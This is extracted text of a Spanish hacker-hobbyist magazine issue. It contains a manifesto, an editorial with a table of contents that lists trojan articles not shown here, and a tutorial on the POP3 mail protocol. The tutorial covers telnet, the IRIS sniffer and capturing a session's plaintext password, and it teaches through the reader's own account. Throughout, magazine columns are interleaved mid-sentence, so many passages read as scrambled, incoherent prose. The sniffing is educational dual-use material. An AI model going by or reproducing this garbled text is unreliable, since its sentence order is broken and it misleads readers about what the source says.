Optik (líder juvenil convertido contiene 5 de "material utilizable" (si es que puede llamarse así). en símbolo de los hackers), Richard Stallman (impulsor del "software gratuito" y GNU), Johan Helsingius (primer conductor de un Remailer Pues NO, lo siento, vosotros seréis nuestros jueces y, llegado el caso, Anónimo), Chen Ing-Hou (autor del virus CIH -Chernobyl- ), Sir Dyistic NUESTROS VERDUGOS. (creadorutor del Back Orifice), David L. Smith (virus Melissa), Reonel Ramonez (virus LoveLetter), Vladimir Levin (Robó electrónicamente Nuestro objetivo es: ACABAR CON LA BASURA DE LA RED (lamers y demás 10 millones de dólares al Citibank), y muchos mas. ¿Cómo? ¿Pero no hemos "esencias") con el único método que conocemos: LA EDUCACIÓN y con un dicho que los hackers no comenten delitos? Pues NO, vuelve a leer su única bandera que será por siempre nuestra firma: SOLO EL CONOCIMIENTO definición… pero claro, de todo hay en la viña del señor, y al igual que hay TE HACE LIBRE LIBRE. delincuentes entre el clero hay hackers que en un momento u otro han ·caido· en la ilegalidad, nadie es perfecto!!!!! … y Bill Gates es un HACKER? Estos son nuestros pilares: LA EDUCACIÓN Y EL CONOCIMIENTO Para ser CONOCIMIENTO. Por supuesto, solo tienes que leerte su biografía. ¿Sorprendido? Espero un HACKER (maldita palabra mal entendida por unos y peor utilizada por que no, porque eso no es nada mas que un cero a la izquierda en comparación otros) solo hace falta dos cosas: curiosidad y medios, a partir de ahora la con lo que vas a encontrar en esta revista.
  • 4. EDITORIAL: EL DIRECTOR SUSTITUTO Nuestro director ha estado de baja durante las últimas semanas y seguirá estándolo por unas INDICE cuantas más, así que le ha tocado al presente, AZIMUT, hacer de “director sustituto”. Ahora mismo son las 7:00 de la mañana y dentro de una hora tengo que tener lista la Revista para entregarla a la Imprenta, ha sido realmente 3 DECLARACION DE INTENCIONES complicado que este número vea la luz, una carrera 4 EDITORIAL contra todo (tiempo, recursos, fuerzas, horas sin dormir... ...) 5 PROTOCOLOS Y SU SEGURIDAD: POP3 18 CONCURSO SUSE LINUX No me entretendré mucho, simplemente espero que este número sea del gusto de la mayoría y 19 PASA TUS PELICULAS A DIVX III EL AUDIO tenga el menor número de errores posible dadas 24SUSCRIPCIONES las circunstancias. 25 PASA TUS PELICULAS A DIVX IV MULTIPLEXANDO Doy las gracias a todos los que han colaborado 29 CURSO DE VISUAL BASIC: LA CALCULADORA conmigo para que PC PASO A PASO 7 esté hoy en 37 BAJATE LOS LOGOS DE PC PASO A PASO (HXC) tus manos y en especial a la paciencia que la mayoría han demostrado en el foro, puesto que 38 IPHXC: EL TERCER TROYANO DE HXC II últimamente no puedo ni postear. 47 COLABORA CON NOSOTROS Desde aquí, pido disculpas a muchos colaboradores 48 APACHE: UNSERVIDOR WEB EN EL PC a quienes no he podido responder sus mails, en 57 SERVIDOR DE HXC. MODO DE EMPLEO cuanto deje la revista en la imprenta me meteré en ello. 58 CCPROXY: EL Iv TROYANO DE PC PASO A PASO 66 GANADOR DEL CONCURSO SUSE LINUX Resumiendo, gracias a todos por leernos, aguantarnos y criticarnos :p 67 NUMEROS ATRASADOS Un ABRAZO muy FUERTE !!!
  • 5. SERIE RAW: CONOCIENDO PROTOCOLOS Y SU SEGURIDAD. RAW1 pOP3 (protocolo de recepcion de correo electronico) -Aprenderemos a encontrar información sobre protocolos (RFCs) -Aprenderemos a instalar y manejar rápidamente un sniffer - Obtendremos una Cuenta POP3 GRATUITA y REDIRECCIONABLE - Investigaremos el funcionamiento del POP3, uno de los protocolos más empleados en la recepción de emails. - Capturaremos las CLAVES de acceso de una sesión POP3 - Empezaremos a perderle el miedo al TELNET - Y mucho más :) 1.- EL PROCESO DE Por supuesto, además de esta finalidad tan INVESTIGACIÓN poética, tenemos también otras muchas aplicaciones más "prácticas", como ya se verá 1.1. LA FILOSOFÍA DE LA SERIE RAW en otros artículos como el que me motivó a iniciar esta serie, o en el apartado final de este Al ser éste el primer artículo de la serie, tendré artículo, que saca unas cuantas conclusiones que esmerarme aquí un poco más para dejar relacionadas con la seguridad en POP3. claros unos cuantos conceptos. Si nuestro cliente de correo (ya sea un cliente Lo que se pretende conseguir con esta serie de correo respetable, o Outlook) es capaz de es una comprensión en profundidad del conectarse a un servidor de correo y enviar y funcionamiento de los protocolos que funcionan recibir mensajes, ¿por qué no vamos a poder sobre TCP/IP, y que utilizamos a diario en hacerlo nosotros? ¡Hurguemos en las tripas de Internet (http, ftp, pop3, smtp, irc, ...). los clientes de correo hasta que seamos capaces Al igual que el castellano o el inglés son de sustituirles! :-D lenguajes pensados para ser utilizados Evidentemente, aunque conozcamos en detalle directamente por el ser humano, los protocolos el funcionamiento de estos protocolos, no nos que utilizamos en Internet (o en nuestra red bastará con dibujar un círculo en el suelo y local) han sido pensados para ser usados vocalizar con voz profunda los comandos que directamente por las máquinas en sus hemos de enviar al servidor, si no que comunicaciones, y no directamente por el ser necesitaremos siempre alguna herramienta humano. Pero esto no impide que unas mentes básica que nos permita establecer una conexión enfermas como las nuestras utilicen también con el servidor (de correo en este caso) y estos protocolos aún sin ser máquinas. :-) enviarle los comandos, así como poder leer ¿Y cual es el fin de esto? Pues el fin principal sus respuestas a los mismos. Para ello es, sin duda, el ansia de saber cómo funcionan podemos utilizar, por ejemplo, un cliente las cosas, en lugar de limitarnos a utilizarlas. de Telnet cualquiera. Esto será así para Es decir, el sustituir nuestra idea de los enanitos toda la serie. :-) transportando paquetes de datos, por conceptos Por si no lo sabéis, cualquier sistema operativo claros del funcionamiento real de las cosas. trae su propio cliente de Telnet, por lo que PC PASO A PASO Nº 7 Página 5
  • 6. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 basta que desde una consola (ya sea una shell con lo que obtendremos directamente una de Linux/Unix, o una ventana MS-DOS en ventana de comandos donde se está ejecutando Windows) escribas "telnet" y pulses enter para nuestro teltet en modo texto. que se abra la aplicación de Telnet de vuestro sistema. Si nunca has abierto un Cliente Telnet, debes estar preguntándote qué es lo que tienes delante de tus ojos a parte de una insípida e indescifrable ! Ya hemos explicado... ventana negra… pues aunque no lo parezca, tienes ante ti una herramienta que te permite Ya hemos explicado mil veces cómo abrir una Ventana de conectarte a cualquier servidor y… bueno, mejor Comandos (o Shell, o Ventana MS-DOS, llámalo como sigue leyendo y lo verás por ti mismo. quieras) desde Windows, consulta los anteriores números Antes de continuar, vamos a familiarizarnos un que es muy fácil (para Windows XP: Menu Inicio --> poco con nuestro nuevo juguete. Lo primero, Ejecutar y escribimos cmd.exe) como siempre, es pedir ayuda escribiendo un interrogante y pulsando enter (con esto accedemos a la ayuda del própio programa) Otra forma de abrir el telnet (en Windows 2000/XP) es ejecutarlo directamente. Vamos al Menu Inicio --> ejecutar, escribimos telnet y pulsamos aceptar Aunque al principio todo esto no te suene de nada, leete las opciones un par de veces. Ummm, hay una interesante puesto que nos ofrece más información: display, pues venga, escribe display y pulsa enter Página 6 PC PASO A PASO Nº 7
  • 7. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 Aquí hay una información MUY IMPORTANTES que es "Eco local deshabilitado". Cuando ! No cierres... estemos conectados a un servidor (en este caso nos conectaremos a un servidor de mail NO CIERRES ESTA VENTANA TELNET, que después tipo POP3), nosotros le enviaremos comandos la utilizaremos :) a ese servidor remoto y él nos contestará; si tenemos deshabilitado el ECO, nuestros comandsos NO APARECERÁN en la pantalla, por lo tanto es muy recomendable activarlo. 1.2. DOCUMENTACIÓN ¿Cómo lo activamos? Pues muy sencillo, fíjate Pero, ¿por dónde empezamos? ¿Cómo voy a en la pantalla anterior (donde vimos el comando saber yo lo que hace mi cliente de correo? Yo display) y vemos otro comando interesante: sólo veo una ventana con un botón muy grande "set", que nos ofrece entre otras cosas la que pone ENVIAR y muchas cosas más. ¿Cómo posibilidad "set ?" (esto nos mostrará una lista puedo saber lo que hace cuando le doy a esos de opciones para este comando). Venga, escribe botones? Lo que voy a explicar aquí son "set ?" (sin comillas, por favor) y pulsa enter. precisamente las dos formas que tenemos de averiguar el funcionamiento interno de estas aplicaciones. La primera opción es documentarse ya que, por suerte, hay a disposición de todo el mundo documentación completa y detallada de todos los protocolos utilizados en Internet. Toda la documentación oficial de protocolos de Internet se encuentra reunida en los llamados RFCs (Request For Comments), a los cuales se puede acceder sin ningún problema desde, por ejemplo, www.rfc-editor.org. Ahí tenemos la base de datos oficial de documentos RFC. Desde esta web podemos ir a la opción RFC SEARCH y escribir, en el caso concreto de este documento, que trata sobre POP3, pues lo que queremos buscar: "POP3". Podemos ver la opción "localecho" (habilita eco Cada una de las entradas que aparecen tras la local). Pues esa es la opción que deseamos :) búsqueda es un documento RFC que podemos Recuerda que estas son opciones del comando leer directamente desde aquí. :-) set, por lo tanto escribe "set localecho" (sin Es importante que nos fijemos en el campo comillas) y pulsa enter. Veremos que obtenemos "More Info (Obs&Upd)", donde nos indican si un mensaje de confirmación. este documento está obsoleto, si ha convertido Al resto de en obsoleto algún otro, o si algún otro opciones del documento complementa el tema con más comando set, dales detalles. un vistazo para que empiecen a Por ejemplo, para nuestra búsqueda de POP3, sonarte tenemos la siguiente tabla de resultados: PC PASO A PASO Nº 7 Página 7
  • 8. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 Aquí vemos que el RFC1939 es el documento que contiene la especificación general del protocolo POP3, pero que esta información es ampliada por los documentos RFC1957, y RFC2449. Vemos que el RFC1734 nos da además información sobre el mecanismo de autenticación de POP3. Lo lógico en este caso es empezar leyendo el RFC1939. Lo más probable es que encontremos en él todo lo que necesitamos, pero si por cualquier motivo necesitásemos ampliar información, ya sabemos dónde hacerlo. Si lo tuyo no es el inglés, puedes probar suerte en el grupo de traducción de RFCs al castellano, en http://www.rfc-es.org/ , aunque me temo que de momento los documentos traducidos son muy pocos y, además, un consejo personal, nunca leáis un documento técnico en una lengua que no sea la original. ;-) Los RFCs al principio pueden dar un poco de miedo, pero en general suelen ser fáciles y rápidos de leer para una persona con unos mínimos conocimientos básicos. En caso de que no podáis con ellos, siempre podéis utilizar al omnisciente Google para encontrar algún documento más orientado al público mortal. :-) Si, aún así, lo vuestro sigue sin ser la documentación técnica, todavía os quedan dos opciones más. La primera, leer el siguiente punto, y la segunda, por supuesto, seguir todos los números de esta revista, que te lo da ya todo masticado. ;-D 1.3. AIREINEGNI Existen básicamente dos formas de hacer las cosas: por las buenas, y por las malas. Por mucho que ciertas "entidades" intenten esforzarse en ocultarnos el funcionamiento de las cosas, siempre habrá alguien suficientemente curioso y suficientemente inteligente como para hurgar hasta dar con la solución. En eso consiste precisamente la Ingeniería Inversa (o Aireinegni, como me gusta a mi llamarla). :-) Imagínate que te compras una calculadora y, ya que la has pagado y es tuya, quieres saber cómo funciona. En vista de que no encuentras ninguna información al respecto en los manuales ni en ningún otro lugar, no te queda más remedio que coger un destornillador y abrirla para ver que hay dentro. Pero... ¡mierda! ¡No tiene tornillos! Los japoneses se han propuesto esta vez evitar a toda costa que descubras cómo funciona su cacharro. ¡Pero no podrán contigo! Vas a por la sierra mecánica y cortas cuidadosamente la carcasa de la calculadora y... ¡Oh, sorpresa! descubres que en su interior hay 27 japoneses acondroplásicos sacando numeritos de unas cajas de cartón. Ahora ya sabes cómo funciona tu flamante calculadora :-) (eso si, ahora a ver como Página 8 PC PASO A PASO Nº 7
  • 9. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 vuelves a cerrar la carcasa para que no se 1.3.1. CAPTURA DE UNA SESIÓN POP3 caigan los enanitos). CON EL SNIFFER IRIS Por tanto, la ingeniería inversa consiste en Vamos a ver un ejemplo concreto de esto. Ya hurgar en el interior de las cosas hasta deducir que el espacio para mi artículo es reducido, he cómo están hechas y cómo funcionan. escogido un sniffer muy sencillo, que es el IRIS, La ingeniería inversa es la base del cracking para ver de forma rápida, y sin entrar en (el arte/ciencia de desproteger las copias de detalle, cómo hacer una captura de una sesión software), pero ha sido también ampliamente completa (en este caso, una sesión POP3). utilizada en temas de redes, como el que nos Utilizaré Iris 1.0, a pesar de que hay ya una ocupa a nosotros en estos momentos. Un versión 4.0.5, ya que para lo que vamos a ejemplo típico es el de Samba, que implementa hacer nos sirve cualquier versión. el protocolo SMB de Microsoft (el famoso NetBios de Windows) sobre plataformas Unix/Linux, y que fue desarrollado mediante ! En nuestra Web... ingeniería inversa. Pero... ¿de qué me sirve a mi esto para mi En nuestra Web (www.hackxcrack.com) encontrarás la misión actual, que es saber cómo funciona el versión 4.0.5 del IRIS. De paso puedes mirarte la página protocolo POP3? ¿Cómo puedo hacer ingeniería oficial de programa, que nunca viene mal ;) inversa para conocer un protocolo? Pues para (http://www.eeye.com) eso tenemos una herramienta que espero que conozcáis, que es un sniffer. Un sniffer es básicamente una aplicación que nos muestra No pretendo dar un cursillo de manejo de IRIS, los datos que circulan a través de nuestra por lo que iremos directamente al grano. conexión de red. Suponiendo que habéis instalado y configurado Cada vez que utilizamos nuestro cliente de IRIS correctamente (no tiene más misterio que correo para recibir correo, estaremos seleccionar vuestra tarjeta de red), voy a dar estableciendo una conexión con un servidor una serie de pasos para capturar la sesión y enviándole una serie de comandos POP3: para realizar esta tarea. Como el sniffer captura todo el tráfico que circula a 1.3.1.1. Configuración del filtro través de nuestras conexiones, capturará Supongo que, igual que yo, y que cualquier también todo el tráfico correspondiente otro flipado de la informática (llámalo geek, si a la conexión con ese servidor gracias lo prefieres), en tu PC habrá ahora mismo al cual recibimos nuestro correo. Si corriendo un cliente de IRC, 4 clientes de FTP, configuramos correctamente nuestro un navegador, un servidor FTP, etc, etc. En sniffer para que filtre todos los datos resumen, que como te pongas a capturar el que captura y nos muestre sólo los referentes tráfico de tu red va a aparecer ahí desde las a esa conexión en concreto, tendremos conversaciones que tienes con el gordo peludo una captura de una sesión completa de ese que dice ser una preciosa sueca de ojos conexión entre nuestro cliente de correo verdes, hasta los chorizos de bytes que y el servidor desde el que recibimos el componen la foto del bomboncito de la semana. correo. Nos bastará ahora con analizar Por tanto, lo primero que hay que hacer es esa captura para deducir el funcionamiento decirle a IRIS que filtre sólo el tráfico que nos del protocolo que utilizan nuestro cliente interesa. Para eso tenemos en la columna de y el servidor para comunicarse. :-) la izquierda una serie de iconos, que son las PC PASO A PASO Nº 7 Página 9
  • 10. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 funciones básicas del programa. Lo que nos interesa ahora es el icono Filters. Se nos abrirá una ventana para editar la configuración de los filtros. Ahí vamos a la pestaña Ports, donde podemos hacer un filtrado por puertos. En la lista Well Known Ports seleccionamos POP3, y aparecerá ahora en la lista Filtered Ports, que es donde están los puertos que hemos seleccionado para filtrar. Es importante que A partir de este momento, ya estamos esté activada la opción Inclusive ya que, en capturando. Lógicamente, no veremos nada, caso contrario, mostraría todos los puertos ya que sólo nos mostrará lo que hemos filtrado, excepto los escogidos. es decir, los datos de las conexiones POP3, y de momento no tenemos ninguna conexión POP3 establecida. Así que este es el momento en el que abrimos nuestro cliente de correo y le decimos que reciba los mensajes del servidor. Volvemos a la ventana de IRIS y... ¡magia! se ha llenado de numerajos y letras. :-) Una vez que hemos terminado de recibir los mensajes, podemos dar a Stop en IRIS. Si no le das al STOP, no podrás hacer el Decode en el siguiente apartado. 1.3.1.3. Interpretación de la captura Se sale por completo de ! En la versión... este artículo analizar los p a q u e t e s re c i b i d o s , En la versión 4.0.5 del IRIS, cuando pulses sobre filters aunque os lo recomiendo verás la opción EDIT FILTERS. Pulsa sobre ella y verás como magnífico ejercicio para comprender una ventana muy parecida a la anterior. Elimina todos los perfectamente el protocolo TCP/IP (importante puertos de la sección FILTERED PORTS (pulsando el si hacéis esto que prestéis atención, entre otras botón REMOVE ALL *eliminar todos*) y añade el cosas, a los Flags del TCP Header), así que POP3(110) que lo tienes a la derecha en la sección WELL nos limitaremos a utilizar una útil herramienta KNOWN PORTS *puertos conocidos* -solo tienes que de IRIS que lo que hace es mostrarnos pulsar el mouse dos veces sobre POP3(110)- ;p directamente la sesión completa, olvidándonos de los detalles de cada paquete. De los iconos de la columna de la izquierda 1.3.1.2. ¡Capturando! vamos ahora al icono Decode. Pulsamos ahora Para comenzar la captura, basta con pulsar el icono Decode Buffer Packets, que lo tenemos sobre el icono Start/Stop Capture, que es también en el menú Decode, y nos aparecerá el que parece un botón de PLAY (también lo la sesión que acabamos de capturar (POP3 tenéis en el menú Capture). (110)). Hacemos doble click, y nos aparecerá la sesión completa en un formato "legible". Lo Página 10 PC PASO A PASO Nº 7
  • 11. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 que aparece en rojo son las respuestas del Lee en perfecto Ingés todo el contrato ;p, abajo servidor, y en azul los comandos que ha enviado del todo selecciona las dos casillas y finalmente nuestro cliente de correo. Por tanto, ¡lo que pulsa PROCEED aparece en azul es precisamente lo que buscábamos! :-D A h o ra u n diminuto formulario. Nosotros c o m o usuario h e m o s p u e s t o yosoygenial y como dominio BonBon.net, así que nuestra dirección de mail POP3 gratuita será yosoygenial@BonBon.net :) Tu pon lo que quieras pero no copies el nuestro o NO PODRÁS CREAR la cuenta ;p El único punto que te puede hacer dudar es eso de Authorization Code (Código de Autorización), simplemente escribe ese código 2. Y AL FIN, EL DICHOSO POP3 en la casilla inmediatamente inferior Confirm Authorization (Confirmar Autorización) y ¡Vamos ya a la práctica! ya está. Otro punto que quizás (a algunos) les Lo primero de todo es, por supuesto, tener impida crear una cuenta es eso de Reminder una cuenta de correo POP3 en cualquier Question (Pregunta), es una pregunta que servidor, ya sea gratuito o de pago. Podéis te hará el sistema en caso de que olvides tu buscar en Google "pop3 gratuito" para encontrar calve, pues pon una pregunta cualquiera y lo cualquier servidor que os de una cuenta POP3. importante es que en la casilla siguiente Bueno, venga, vamos a crear juntos una cuenta Reminder Answer (Respuesta a la POP3 gratuita. Nos vamos por ejemplo a pregunta anterior) pongas una respuesta http://www.hotpop.com/ y nos aparecerá una SIN DEJAR ESPACIOS EN BLANCO, puesto que Web en la cual hay un botón llamado Signup!, en caso contrario el sistema no lo admitirá ya sabes, púlsalo ;) como opción válida. PC PASO A PASO Nº 7 Página 11
  • 12. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 Todo esto es muy sencillo y me da hasta mail de Telefónica hubieses utilizado el que vergüenza explicarlo, pero bueno, esto es PC acabamos de crear, solo tendrías que PASO A PASO ¿no? ;) redireccionar el correo hacia la nueva cuenta Ahora, pulsaremos el botón NEXT (abajo del de correo de tu nuevo ISP (Proveedor de todo) y aparecerá una ventana donde Internet), así de sencillo. Bueno, además sirve seleccionaremos qué servicio queremos. Solo para otras cosas, como no dar a nadie tu podemos seleccionar una opción, BASIC, la verdadera dirección de correo; si das la que única que es FREE! (gratuita). Pues venga, acabas de crear, cualquier mail que recibas seleccionamos BASIC y pulsamos NEXT. puedes redireccionarlo a la TUYA (la que te da Ahora nos aparecerá un formulario en que tu ISP). introduciremos los datos que queramos, volveremos a pulsar next, rellenaremos otro Te dejamos que pienses en ello, mientras, como formulario, pulsaremos next y llegaremos a para seguir este texto no necesitamos una ventana muy interesante. redireccionar nada, pulsaremos sobre "I want to keep my mail on the server and use a POP Client" para empezar de una vez por todas a utilizar nuestra nueva, permanente y gratuita Cuenta POP3 :) Hemos seleccionado este proveedor de cuentas POP3 precisamente porque te permite hacer forwarding, es decir, redireccionar. Esta pantalla te explica en perfecto Ingles las ventajas de poder redireccionar el correo, soluciona (por ejemplo) un problema muy común en España: Listo!!! Ahora si introduces tu dirección (en Imagina que hoy te conectas a Internet nuestro caso yosoygenial@BonBon.net) y tu mediante Terra y dentro de unos meses decides clave accederás a un menu que te permite cambiar de proveedor, el mail de Terra dejará configurar tu cuenta. Por ahora lo dejaremos de existir por mucho que ruegues a Telefónica tal y como está, pero pulsaremos sobre la que te lo deje activo. Si en lugar de utilizar el opción POP CLIENT SETTINGS Página 12 PC PASO A PASO Nº 7
  • 13. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 escribir desde una consola (shell de Linux/Unix, o ventana MS-DOS en Windows) lo siguiente: telnet pop.bonbon.net 110 Con esto se nos abrirá una aplicación de Telnet que conectará automáticamente con el servidor de correo, en el puerto de POP3. ! Sí ya tenemos... Si ya tenemos el TELNET abierto (y nosotros lo tenemos activo desde el punto 1.1 de este artículo, ¿recuerdas? Donde te advertimos que NO CERRASES la ventana Con lo que obtendremos los datos necesarios TELNET), entonces, en lugar de utilizar la anterior para poder acceder a nuestra cuenta. instrucción simplemente escribiremos "o pop.bonbon.net 110" (sin comillas) y pulsaremos enter. El resultado será idéntico. Estos son los datos con los que configurarías -- o es el comando OPEN: abrir/establecer conexión tu Cliente de Correo (por ejemplo el Outlook) -- pop.bonbon.net es el nombre de dominio donde hemos y que nosotros utilizaremos para ejercitarnos creado la cuenta de correo. Ese nombre de dominio con el Telnet y entender qué es lo que ocurre corresponde a una IP y esa IP corresponde a un PC dónde cada vez que nos bajamos el correo :) hay un programa (servidor de mail) que atiende las peticiones al puerto 110. Si no te queda claro, leete de nuevo el número 2.1. ESTABLECIMIENTO DE LA CONEXIÓN uno de hack x crack, en concreto el curso de TCP/IP… por Mirando la pantalla anterior, podemos ver que cierto, recuerda que el número uno puedes bajártelo GRATIS el nombre del servidor POP3 es de nuestra Web en formato PDF o pedirlo por correo --> popbonbon.net. Tenemos que abrir una www.hackxcrack.com conexión con ese servidor en el puerto 110, que es el puerto de POP3, para lo cual podemos PC PASO A PASO Nº 7 Página 13
  • 14. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 nuestro cliente de Telnet no tiene eco local, -- 110 es el puerto que escucha el Servidor de Correo es conveniente que lo activemos antes de Remoto. Si te intentases conectar en otro puerto, o no se escribir nada, ya que si no no podremos ver el establecería la conexión o estarías conectándote a otro tipo texto que escribimos nosotros mismos. Esto de servicio (puerto 80 para Servidor Web, puerto 21 para ya lo dijimos al principio de este artículo y es servidor FTP… tienes una buena lista en el número 6 de MUY IMPORTANTE. Aquí tienes como ejemplo PC PASO A PASO). el cliente de Telnet de Windows 9x, donde el eco local se activa en la opción Preferencias del menú Terminal. Si todo ha ido bien, el servidor nos devolverá una respuesta parecida a esta: +OK hello from popgate(2.23.11). Siempre que la respuesta empiece por +OK es que todo ha ido bien. :) Siempre que la respuesta empiece por -ERR es que algo ha ido mal. :( ! A partir de ahora... A partir de ahora YA ESTAMOS CONECTADOS al Servidor Remoto (en este caso un Servidor POP3). Los Este es el cliente telnet de Windows 9X comandos que introduciremos a continuación NO SON COMANDOS TELNET, sino comandos de POP3, es decir, Ya estamos preparados para escribir el primer comandos que entenderá el Servidor de Correo. comando, que va a ser precisamente el que le No hay que confundirse con esto!!! Haciendo una analogía diga al servidor cual es nuestro nombre de entre un teléfono y un TELNET diremos que, para establecer usuario. una comunicación con un teléfono primero hay que Suponiendo que nuestro usuario es descolgar e introducir un número al que llamar (en TELNET yosoygenial, escribimos: en lugar de un número introducimos un comando, en este USER yosoygenial --> este es nuestro user, caso o pop.bonbon.net 110). Pero una vez establecida la tu debes poner el tuyo ;p comunicación, cuando desde el otro lado una persona (Por supuesto, todas las líneas se terminan con descuelga el auricular, dejamos tranquilo el teclado del Intro...). Si todo ha ido bien, la respuesta teléfono y empezamos a hablar en el idioma adecuado, en habitual será algo así: nuestro caso Español (en TELNET exactamente igual, una +OK password required. vez establecida la conexión con un Servidor Remoto nos Ahora tenemos que escribir el password que, olvidamos de los Comandos Telnet y empezamos a "hablar" supongamos que es superclave: en el lenguaje de nuestro interlocutor, en este caso un PASS superclave --> esta es nuestra clave, Servidor que habla POP3). tu debes poner la tuya ;p Si todo ha ido bien, ¡ya estamos dentro de nuestra cuenta de correo! Llegados a este 2.2. AUTENTICACIÓN punto, las respuestas del servidor pueden ser muy diferentes, pero tienen que empezar Lo primero de todo es identificarnos con nuestro siempre por +OK, ya que si algo ha salido mal nombre de usuario y nuestro password. Si en la autenticación, no estaremos en nuestra Página 14 PC PASO A PASO Nº 7
  • 15. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 cuenta :( Cerramos el cliente de correo y ahora que ya hemos estrenado la cuenta, la cosa será 2.3. LECTURA DE LOS diferente. Volvemos al Telnet y tras completar MENSAJES la autenticación (después del comando PASS) podríamos tener algo como esto: 2.3.1. Comando STAT Como decía, una vez +OK maildrop ready, 2 message (2163 octets) dentro de nuestra cuenta, el servidor nos STAT responderá de forma diferente según haya o +OK 2 (2163) no mensajes sin leer en el servidor. En caso de que no haya mensajes sin leer, la respuesta Como vemos, hay dos mensajes, de 2163 bytes puede ser algo parecido a esto: (octetos). +OK maildrop ready, 0 messages (0 octets) Cuando hay más de un mensaje, podemos ver (3885111 6291111) el tamaño individual de cada mensaje con el Esto nos diría que hay 0 mensajes. comando: En realidad, la forma correcta de hacer esto, LIST es mediante el comando: Tras esto, obtendríamos una lista de los mensajes, con el tamaño de cada uno. STAT (introducimos el comando y pulsamos Si queremos ver el tamaño concreto de un enter) mensaje, podemos pasar el número de mensaje c o m o a r g u m e n t o a l c o m a n d o L I S T: ¿Por qué es más "correcta" esta forma? Porque LIST 1 las especificaciones de POP3 no obligan a que Y nos dará sólo el tamaño del mensaje 1. el servidor nos de esta información cada vez que conectamos, por lo que la forma de asegurarnos es utilizar el comando especificado para ello en el protocolo. Tras este comando, nos debería responder con 2 números, el primero de los cuales será el numero de mensajes que hay en el servidor (en tu cuenta, claro), y el segundo será el tamaño en bytes de los mismos. Siguiendo con el ejemplo de que no haya mensajes en el servidor, esta sería una respuesta: +OK 0 0 2.3.3. Comando RETR Una vez que ya sabemos los mensajes que hay, 2.3.2. Comando podemos ver el contenido de los mismos. Viendo LIST el tamaño de cada mensaje podemos hacernos Antes de seguir una idea de si el mensaje contendrá sólo texto, vamos a enviarnos o también un attachment (archivo adjunto). En un mail a nuestra caso de que queráis ver un mensaje con nueva y reluciente attachment, habría que entrar en el tema de cuenta de correos, ya sabes, abre tu Cliente la decodificación de binarios, y me temo que de Correo (Eudora, Messenger, Outlook, Kmail...) esto se saldría del tema. :-( y envíate un par de mails diciendo lo guapo Así que vamos a ver un simple mensaje de que eres y esas cosas). texto. Continuando con el ejemplo anterior, 2 PC PASO A PASO Nº 7 Página 15
  • 16. PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 mensajes de 1283 y 880 bytes, por el tamaño deducimos claramente que los mensajes contienen sólo texto y, además, muy poco texto. ¿Por qué digo que es muy poco texto? Porque de esos 956 bytes, la mayoría serán la cabecera del mensaje, como veremos ahora. Vamos a utilizar el comando RETR para ver el contenido completo del mensaje 1, de la siguiente manera: CABECERA RETR 1 Si el mensaje existe, y todo ha ido bien, a continuación el servidor nos soltará a pelo el contenido completo del mensaje. Si no tenéis configurado vuestro cliente de correo para que muestre las cabeceras completas, la respuesta os sonará a chino, pero si no, lo que veréis será exactamente lo que veis cada vez MENSAJE que recibís un mensaje. Explicar las cabeceras si que se sale del espacio disponible para este artículo, así que si realmente os interesa podéis ! El cuerpo... investigar por vuestra cuenta. Lo que más nos interesará en principio son los 3 típicos campos El cuerpo del mensaje original contiene dos frases: que podemos ver siempre que recibimos un - Aquí estamos pasando el rato y probando acentos email: From (el "supuesto" emisor del - Aquí estámos pasándo él ráto y probándo acéntos mensaje), To (el destinatario del mensaje), y Como curiosidad, fíjate que en la Ventana telnet las tildes Subject (el asunto del mensaje). Buscando son sustituidas por símbolos y letras. Si recogieses los en el chorizo que compone la cabecera podréis mails mediante un Cliente de Correo, verías que aparecería encontrar esos tres campos sin problemas. el mensaje original perfectamente construido (con tildes). ¿Por qué ocurre esto? ¿Por qué no vemos las tildes en el Telnet? Como ya hemos ido aprendiendo, todo funciona mediante estándares, y el correo electrónico no es diferente. En principio un Cliente de Correo solo puede leer (entender/interpretar) caractéres ASCII. En la página 58 del número 3 de Hack x Crack ya os dimos una tabla ASCII, puedes comprobar que para una letra acentuada NO EXISTE traducción ASCII, por lo tanto, cuando se introduce un valor no interpretable mediante ASCII, este es transformado (traducido) a lo que podemos llamar un ASCII-Extendido (una ASCII ampliado). Esta transformación la hace el Cliente de Correo directamente y de forma transparente para el usuario. Cuando envías en un mail la vocal i acentuada, el Cliente (Outlook por ejemplo) ENVIARÁ la cadena "=ED" en lugar de "í"… ummm… entonces ¿por qué cuando recibo Página 16 PC PASO A PASO Nº 7
